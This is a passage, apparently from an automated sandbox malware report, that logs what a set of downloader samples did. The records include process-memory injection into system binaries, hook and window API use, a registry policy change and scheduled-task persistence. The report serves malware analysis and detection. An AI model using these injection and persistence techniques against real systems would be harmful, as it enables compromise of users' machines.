Token: SeShutdownPrivilege N/A C:\Windows\System32\wbem\WMIC.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\wbem\WMIC.exe N/A
Token: SeSystemEnvironmentPrivilege N/A C:\Windows\System32\wbem\WMIC.exe N/A
Token: SeRemoteShutdownPrivilege N/A C:\Windows\System32\wbem\WMIC.exe N/A
Token: SeUndockPrivilege N/A C:\Windows\System32\wbem\WMIC.exe N/A
Token: SeManageVolumePrivilege N/A C:\Windows\System32\wbem\WMIC.exe N/A
Token: 33 N/A C:\Windows\System32\wbem\WMIC.exe N/A
Token: 34 N/A C:\Windows\System32\wbem\WMIC.exe N/A
Token: 35 N/A C:\Windows\System32\wbem\WMIC.exe N/A
Token: 36 N/A C:\Windows\System32\wbem\WMIC.exe N/A
Token: SeIncreaseQuotaPrivilege N/A C:\Windows\System32\wbem\WMIC.exe N/A
Token: SeSecurityPrivilege N/A C:\Windows\System32\wbem\WMIC.exe N/A
Token: SeTakeOwnershipPrivilege N/A C:\Windows\System32\wbem\WMIC.exe N/A
Token: SeLoadDriverPrivilege N/A C:\Windows\System32\wbem\WMIC.exe N/A
Token: SeSystemProfilePrivilege N/A C:\Windows\System32\wbem\WMIC.exe N/A
Token: SeSystemtimePrivilege N/A C:\Windows\System32\wbem\WMIC.exe N/A
Token: SeProfSingleProcessPrivilege N/A C:\Windows\System32\wbem\WMIC.exe N/A
Token: SeIncBasePriorityPrivilege N/A C:\Windows\System32\wbem\WMIC.exe N/A

Suspicious use of FindShellTrayWindow

Description Indicator Process Target
N/A N/A C:\Program Files\7-Zip\7zFM.exe N/A
N/A N/A C:\Program Files\7-Zip\7zFM.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\is-B9IG3.tmp\stories.tmp N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\33988\Paintball.com N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\33988\Paintball.com N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\33988\Paintball.com N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A

Suspicious use of SendNotifyMessage

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\33988\Paintball.com N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\33988\Paintball.com N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\33988\Paintball.com N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A

Suspicious use of SetWindowsHookEx

Description Indicator Process Target
N/A N/A C:\Users\Admin\Desktop\241127-xqsswsslej_pw_infected\Downloaders\4363463463464363463463463\Files\stories.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\is-B9IG3.tmp\stories.tmp N/A
N/A N/A C:\Users\Admin\AppData\Local\TuneAudioTool 2012.3.8200\tuneaudiotool32.exe N/A
N/A N/A C:\Users\Admin\Desktop\241127-xqsswsslej_pw_infected\Downloaders\New Text Document mod.exse\a\x.exe N/A
N/A N/A C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe N/A
N/A N/A C:\Users\Admin\Desktop\241127-xqsswsslej_pw_infected\Downloaders\4363463463464363463463463\Files\KillingInstructional.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\33988\Paintball.com N/A
N/A N/A C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\33988\Paintball.com N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Users\Admin\AppData\Roaming\Microsoft-Build-Tools\Client.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Users\Admin\Desktop\241127-xqsswsslej_pw_infected\Downloaders\4363463463464363463463463\Files\QuizPokemon.exe N/A
N/A N/A C:\Users\Admin\Desktop\241127-xqsswsslej_pw_infected\Downloaders\4363463463464363463463463\Files\t.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\812297\Shopzilla.pif N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Users\Admin\Desktop\241127-xqsswsslej_pw_infected\Downloaders\4363463463464363463463463\Files\center.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\CenterRun.exe N/A
N/A N/A C:\Users\Admin\Documents\seetrol\center\SeetrolCenter.exe N/A
N/A N/A C:\Users\Admin\Documents\seetrol\center\SeetrolCenter.exe N/A
N/A N/A C:\Users\Admin\Documents\seetrol\center\SeetrolCenter.exe N/A
N/A N/A C:\Users\Admin\Documents\seetrol\center\SeetrolCenter.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\812297\Shopzilla.pif N/A
N/A N/A C:\Users\Admin\Desktop\241127-xqsswsslej_pw_infected\Downloaders\4363463463464363463463463\Files\downloader.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\Windows Startup\Sever Startup.exe N/A
N/A N/A C:\Users\Admin\Desktop\241127-xqsswsslej_pw_infected\Downloaders\4363463463464363463463463\Files\new.exe N/A
N/A N/A C:\Users\Admin\Documents\seetrol\center\SeetrolCenter.exe N/A
N/A N/A C:\Users\Admin\Documents\seetrol\center\SeetrolCenter.exe N/A
N/A N/A C:\Users\Admin\Documents\seetrol\center\SeetrolCenter.exe N/A
N/A N/A C:\Users\Admin\Documents\seetrol\center\SeetrolCenter.exe N/A
N/A N/A C:\Users\Admin\Desktop\241127-xqsswsslej_pw_infected\Downloaders\4363463463464363463463463\Files\random.exe N/A

Suspicious use of WriteProcessMemory

Description Indicator Process Target
PID 5032 wrote to memory of 1204 N/A C:\Users\Admin\Desktop\241127-xqsswsslej_pw_infected\Downloaders\New Text Document mod.exse\New Text Document mod.exe C:\Users\Admin\Desktop\241127-xqsswsslej_pw_infected\Downloaders\New Text Document mod.exse\a\TPB-1.exe
PID 5032 wrote to memory of 1204 N/A C:\Users\Admin\Desktop\241127-xqsswsslej_pw_infected\Downloaders\New Text Document mod.exse\New Text Document mod.exe C:\Users\Admin\Desktop\241127-xqsswsslej_pw_infected\Downloaders\New Text Document mod.exse\a\TPB-1.exe
PID 5032 wrote to memory of 1204 N/A C:\Users\Admin\Desktop\241127-xqsswsslej_pw_infected\Downloaders\New Text Document mod.exse\New Text Document mod.exe C:\Users\Admin\Desktop\241127-xqsswsslej_pw_infected\Downloaders\New Text Document mod.exse\a\TPB-1.exe
PID 5032 wrote to memory of 2376 N/A C:\Users\Admin\Desktop\241127-xqsswsslej_pw_infected\Downloaders\New Text Document mod.exse\New Text Document mod.exe C:\Users\Admin\Desktop\241127-xqsswsslej_pw_infected\Downloaders\New Text Document mod.exse\a\TestExe.exe
PID 5032 wrote to memory of 2376 N/A C:\Users\Admin\Desktop\241127-xqsswsslej_pw_infected\Downloaders\New Text Document mod.exse\New Text Document mod.exe C:\Users\Admin\Desktop\241127-xqsswsslej_pw_infected\Downloaders\New Text Document mod.exse\a\TestExe.exe
PID 5032 wrote to memory of 2376 N/A C:\Users\Admin\Desktop\241127-xqsswsslej_pw_infected\Downloaders\New Text Document mod.exse\New Text Document mod.exe C:\Users\Admin\Desktop\241127-xqsswsslej_pw_infected\Downloaders\New Text Document mod.exse\a\TestExe.exe
PID 5032 wrote to memory of 1956 N/A C:\Users\Admin\Desktop\241127-xqsswsslej_pw_infected\Downloaders\New Text Document mod.exse\New Text Document mod.exe C:\Users\Admin\Desktop\241127-xqsswsslej_pw_infected\Downloaders\New Text Document mod.exse\a\x.exe
PID 5032 wrote to memory of 1956 N/A C:\Users\Admin\Desktop\241127-xqsswsslej_pw_infected\Downloaders\New Text Document mod.exse\New Text Document mod.exe C:\Users\Admin\Desktop\241127-xqsswsslej_pw_infected\Downloaders\New Text Document mod.exse\a\x.exe
PID 1956 wrote to memory of 4936 N/A C:\Users\Admin\Desktop\241127-xqsswsslej_pw_infected\Downloaders\New Text Document mod.exse\a\x.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 1956 wrote to memory of 4936 N/A C:\Users\Admin\Desktop\241127-xqsswsslej_pw_infected\Downloaders\New Text Document mod.exse\a\x.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 5032 wrote to memory of 2864 N/A C:\Users\Admin\Desktop\241127-xqsswsslej_pw_infected\Downloaders\New Text Document mod.exse\New Text Document mod.exe C:\Users\Admin\Desktop\241127-xqsswsslej_pw_infected\Downloaders\New Text Document mod.exse\a\PDFReader.exe
PID 5032 wrote to memory of 2864 N/A C:\Users\Admin\Desktop\241127-xqsswsslej_pw_infected\Downloaders\New Text Document mod.exse\New Text Document mod.exe C:\Users\Admin\Desktop\241127-xqsswsslej_pw_infected\Downloaders\New Text Document mod.exse\a\PDFReader.exe
PID 5032 wrote to memory of 2864 N/A C:\Users\Admin\Desktop\241127-xqsswsslej_pw_infected\Downloaders\New Text Document mod.exse\New Text Document mod.exe C:\Users\Admin\Desktop\241127-xqsswsslej_pw_infected\Downloaders\New Text Document mod.exse\a\PDFReader.exe
PID 3496 wrote to memory of 3828 N/A C:\Users\Admin\Desktop\241127-xqsswsslej_pw_infected\Downloaders\4363463463464363463463463\4363463463464363463463463.exe C:\Users\Admin\Desktop\241127-xqsswsslej_pw_infected\Downloaders\4363463463464363463463463\Files\stories.exe
PID 3496 wrote to memory of 3828 N/A C:\Users\Admin\Desktop\241127-xqsswsslej_pw_infected\Downloaders\4363463463464363463463463\4363463463464363463463463.exe C:\Users\Admin\Desktop\241127-xqsswsslej_pw_infected\Downloaders\4363463463464363463463463\Files\stories.exe
PID 3496 wrote to memory of 3828 N/A C:\Users\Admin\Desktop\241127-xqsswsslej_pw_infected\Downloaders\4363463463464363463463463\4363463463464363463463463.exe C:\Users\Admin\Desktop\241127-xqsswsslej_pw_infected\Downloaders\4363463463464363463463463\Files\stories.exe
PID 3828 wrote to memory of 1284 N/A C:\Users\Admin\Desktop\241127-xqsswsslej_pw_infected\Downloaders\4363463463464363463463463\Files\stories.exe C:\Users\Admin\AppData\Local\Temp\is-B9IG3.tmp\stories.tmp
PID 3828 wrote to memory of 1284 N/A C:\Users\Admin\Desktop\241127-xqsswsslej_pw_infected\Downloaders\4363463463464363463463463\Files\stories.exe C:\Users\Admin\AppData\Local\Temp\is-B9IG3.tmp\stories.tmp
PID 3828 wrote to memory of 1284 N/A C:\Users\Admin\Desktop\241127-xqsswsslej_pw_infected\Downloaders\4363463463464363463463463\Files\stories.exe C:\Users\Admin\AppData\Local\Temp\is-B9IG3.tmp\stories.tmp
PID 1956 wrote to memory of 4732 N/A C:\Users\Admin\Desktop\241127-xqsswsslej_pw_infected\Downloaders\New Text Document mod.exse\a\x.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 1956 wrote to memory of 4732 N/A C:\Users\Admin\Desktop\241127-xqsswsslej_pw_infected\Downloaders\New Text Document mod.exse\a\x.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 1284 wrote to memory of 2944 N/A C:\Users\Admin\AppData\Local\Temp\is-B9IG3.tmp\stories.tmp C:\Users\Admin\AppData\Local\TuneAudioTool 2012.3.8200\tuneaudiotool32.exe
PID 1284 wrote to memory of 2944 N/A C:\Users\Admin\AppData\Local\Temp\is-B9IG3.tmp\stories.tmp C:\Users\Admin\AppData\Local\TuneAudioTool 2012.3.8200\tuneaudiotool32.exe
PID 1284 wrote to memory of 2944 N/A C:\Users\Admin\AppData\Local\Temp\is-B9IG3.tmp\stories.tmp C:\Users\Admin\AppData\Local\TuneAudioTool 2012.3.8200\tuneaudiotool32.exe
PID 1956 wrote to memory of 2632 N/A C:\Users\Admin\Desktop\241127-xqsswsslej_pw_infected\Downloaders\New Text Document mod.exse\a\x.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 1956 wrote to memory of 2632 N/A C:\Users\Admin\Desktop\241127-xqsswsslej_pw_infected\Downloaders\New Text Document mod.exse\a\x.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 1956 wrote to memory of 560 N/A C:\Users\Admin\Desktop\241127-xqsswsslej_pw_infected\Downloaders\New Text Document mod.exse\a\x.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 1956 wrote to memory of 560 N/A C:\Users\Admin\Desktop\241127-xqsswsslej_pw_infected\Downloaders\New Text Document mod.exse\a\x.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 3496 wrote to memory of 4760 N/A C:\Users\Admin\Desktop\241127-xqsswsslej_pw_infected\Downloaders\4363463463464363463463463\4363463463464363463463463.exe C:\Users\Admin\Desktop\241127-xqsswsslej_pw_infected\Downloaders\4363463463464363463463463\Files\Amadeus.exe
PID 3496 wrote to memory of 4760 N/A C:\Users\Admin\Desktop\241127-xqsswsslej_pw_infected\Downloaders\4363463463464363463463463\4363463463464363463463463.exe C:\Users\Admin\Desktop\241127-xqsswsslej_pw_infected\Downloaders\4363463463464363463463463\Files\Amadeus.exe
PID 3496 wrote to memory of 4760 N/A C:\Users\Admin\Desktop\241127-xqsswsslej_pw_infected\Downloaders\4363463463464363463463463\4363463463464363463463463.exe C:\Users\Admin\Desktop\241127-xqsswsslej_pw_infected\Downloaders\4363463463464363463463463\Files\Amadeus.exe
PID 3496 wrote to memory of 2148 N/A C:\Users\Admin\Desktop\241127-xqsswsslej_pw_infected\Downloaders\4363463463464363463463463\4363463463464363463463463.exe C:\Users\Admin\Desktop\241127-xqsswsslej_pw_infected\Downloaders\4363463463464363463463463\Files\Loader.exe
PID 3496 wrote to memory of 2148 N/A C:\Users\Admin\Desktop\241127-xqsswsslej_pw_infected\Downloaders\4363463463464363463463463\4363463463464363463463463.exe C:\Users\Admin\Desktop\241127-xqsswsslej_pw_infected\Downloaders\4363463463464363463463463\Files\Loader.exe
PID 3496 wrote to memory of 2148 N/A C:\Users\Admin\Desktop\241127-xqsswsslej_pw_infected\Downloaders\4363463463464363463463463\4363463463464363463463463.exe C:\Users\Admin\Desktop\241127-xqsswsslej_pw_infected\Downloaders\4363463463464363463463463\Files\Loader.exe
PID 2148 wrote to memory of 4604 N/A C:\Users\Admin\Desktop\241127-xqsswsslej_pw_infected\Downloaders\4363463463464363463463463\Files\Loader.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe
PID 2148 wrote to memory of 4604 N/A C:\Users\Admin\Desktop\241127-xqsswsslej_pw_infected\Downloaders\4363463463464363463463463\Files\Loader.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe
PID 2148 wrote to memory of 4604 N/A C:\Users\Admin\Desktop\241127-xqsswsslej_pw_infected\Downloaders\4363463463464363463463463\Files\Loader.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe
PID 2148 wrote to memory of 4604 N/A C:\Users\Admin\Desktop\241127-xqsswsslej_pw_infected\Downloaders\4363463463464363463463463\Files\Loader.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe
PID 2148 wrote to memory of 4604 N/A C:\Users\Admin\Desktop\241127-xqsswsslej_pw_infected\Downloaders\4363463463464363463463463\Files\Loader.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe
PID 2148 wrote to memory of 4604 N/A C:\Users\Admin\Desktop\241127-xqsswsslej_pw_infected\Downloaders\4363463463464363463463463\Files\Loader.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe
PID 2148 wrote to memory of 4604 N/A C:\Users\Admin\Desktop\241127-xqsswsslej_pw_infected\Downloaders\4363463463464363463463463\Files\Loader.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe
PID 2148 wrote to memory of 4604 N/A C:\Users\Admin\Desktop\241127-xqsswsslej_pw_infected\Downloaders\4363463463464363463463463\Files\Loader.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe
PID 2148 wrote to memory of 4604 N/A C:\Users\Admin\Desktop\241127-xqsswsslej_pw_infected\Downloaders\4363463463464363463463463\Files\Loader.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe
PID 3496 wrote to memory of 3148 N/A C:\Users\Admin\Desktop\241127-xqsswsslej_pw_infected\Downloaders\4363463463464363463463463\4363463463464363463463463.exe C:\Users\Admin\Desktop\241127-xqsswsslej_pw_infected\Downloaders\4363463463464363463463463\Files\KillingInstructional.exe
PID 3496 wrote to memory of 3148 N/A C:\Users\Admin\Desktop\241127-xqsswsslej_pw_infected\Downloaders\4363463463464363463463463\4363463463464363463463463.exe C:\Users\Admin\Desktop\241127-xqsswsslej_pw_infected\Downloaders\4363463463464363463463463\Files\KillingInstructional.exe
PID 3496 wrote to memory of 3148 N/A C:\Users\Admin\Desktop\241127-xqsswsslej_pw_infected\Downloaders\4363463463464363463463463\4363463463464363463463463.exe C:\Users\Admin\Desktop\241127-xqsswsslej_pw_infected\Downloaders\4363463463464363463463463\Files\KillingInstructional.exe
PID 3148 wrote to memory of 1876 N/A C:\Users\Admin\Desktop\241127-xqsswsslej_pw_infected\Downloaders\4363463463464363463463463\Files\KillingInstructional.exe C:\Windows\SysWOW64\cmd.exe
PID 3148 wrote to memory of 1876 N/A C:\Users\Admin\Desktop\241127-xqsswsslej_pw_infected\Downloaders\4363463463464363463463463\Files\KillingInstructional.exe C:\Windows\SysWOW64\cmd.exe
PID 3148 wrote to memory of 1876 N/A C:\Users\Admin\Desktop\241127-xqsswsslej_pw_infected\Downloaders\4363463463464363463463463\Files\KillingInstructional.exe C:\Windows\SysWOW64\cmd.exe
PID 1876 wrote to memory of 4824 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\tasklist.exe
PID 1876 wrote to memory of 4824 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\tasklist.exe
PID 1876 wrote to memory of 4824 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\tasklist.exe
PID 1876 wrote to memory of 2648 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\findstr.exe
PID 1876 wrote to memory of 2648 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\findstr.exe
PID 1876 wrote to memory of 2648 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\findstr.exe
PID 1876 wrote to memory of 4368 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\tasklist.exe
PID 1876 wrote to memory of 4368 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\tasklist.exe
PID 1876 wrote to memory of 4368 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\tasklist.exe
PID 1876 wrote to memory of 4532 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\findstr.exe
PID 1876 wrote to memory of 4532 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\findstr.exe
PID 1876 wrote to memory of 4532 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\findstr.exe
PID 1876 wrote to memory of 3452 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\cmd.exe
PID 1876 wrote to memory of 3452 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\cmd.exe
PID 1876 wrote to memory of 3452 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\cmd.exe

System policy modification

evasion
Description Indicator Process Target
Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System C:\Users\Admin\Documents\seetrol\center\SeetrolCenter.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLinkedConnections = "1" C:\Users\Admin\Documents\seetrol\center\SeetrolCenter.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System C:\Users\Admin\Documents\seetrol\center\SeetrolCenter.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLinkedConnections = "1" C:\Users\Admin\Documents\seetrol\center\SeetrolCenter.exe N/A

Uses Task Scheduler COM API

persistence

Views/modifies file attributes

evasion
Description Indicator Process Target
N/A N/A C:\Windows\system32\attrib.exe N/A
N/A N/A C:\Windows\system32\attrib.exe N/A

Processes

C:\Windows\Explorer.EXE

C:\Windows\Explorer.EXE

C:\Program Files\7-Zip\7zFM.exe

"C:\Program Files\7-Zip\7zFM.exe" "C:\Users\Admin\AppData\Local\Temp\241127-xqsswsslej_pw_infected.zip"

C:\Windows\system32\svchost.exe

C:\Windows\system32\svchost.exe -k LocalService -p -s NPSMSvc

C:\Windows\system32\svchost.exe

C:\Windows\system32\svchost.exe -k LocalSystemNetworkRestricted -p -s DisplayEnhancementService

C:\Windows\System32\rundll32.exe

C:\Windows\System32\rundll32.exe C:\Windows\System32\shell32.dll,SHCreateLocalServerRunDll {9aa46009-3ce0-458a-a354-715610a075e6} -Embedding

C:\Users\Admin\Desktop\241127-xqsswsslej_pw_infected\Downloaders\New Text Document mod.exse\New Text Document mod.exe

"C:\Users\Admin\Desktop\241127-xqsswsslej_pw_infected\Downloaders\New Text Document mod.exse\New Text Document mod.exe"

C:\Users\Admin\Desktop\241127-xqsswsslej_pw_infected\Downloaders\New Text Document mod.exse\a\TPB-1.exe

